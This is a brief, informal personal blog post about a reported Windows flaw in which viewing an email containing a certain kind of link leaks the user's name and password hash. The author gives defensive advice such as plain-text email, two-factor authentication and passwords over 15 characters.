I love this one. A CSO Online story a few days ago where you can just send someone an email with a certain type of URL in a link somewhere and if the person uses Windows, when they view the email it sends your system their username and password hash.
This is a new twist to the IE sends you password hack already described here and it’s something we should have figured out already. And it’w worse really. Every program on Windows that uses URLs like file dialogs or editors or the desktop have this bug/feature. I can trigger this with notepad.
So my recommendations: If you can’t avoid Windows use text view for emails, 2 factor authentication and long passwords. Long passwords because the longer the password the less likely it will be in rainbow tables. And always use a password longer than 15 characters because Windows passwords smaller than that can be decrypted.
I realize that telling everyone to switch away from Windows is not possible, to much invested in it everywhere and besides I wouldn’t have anything to do. Windows problems and fixes are what keeps the computer industry going.
Hopefully I won’t be so long til a new post next time. Sorry guys.